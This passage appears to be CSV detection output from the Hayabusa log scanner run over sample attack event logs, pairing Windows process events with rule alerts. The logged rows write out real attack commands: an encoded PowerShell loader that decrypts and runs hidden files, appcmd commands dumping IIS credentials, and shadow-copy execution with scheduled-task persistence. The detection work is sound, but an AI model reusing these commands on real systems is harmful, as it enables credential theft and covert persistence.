QAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.435 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:20.555 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 15:12:38.241 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.241 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.290 +00:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.290 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.290 +00:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:38.290 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:43.990 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:43.990 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:44.055 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:44.055 +00:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:45.405 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:45.405 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:45.491 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:45.491 +00:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:46.981 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:46.981 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:47.402 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:47.402 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:47.478 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:47.478 +00:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:48.655 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:48.655 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:48.763 +00:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:48.827 +00:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.447 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.447 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.544 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.544 +00:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.544 +00:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.632 +00:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:54.632 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:59.519 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:59.519 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-27 15:12:59.578 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 02:13:52.171 +00:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:13:52.429 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" 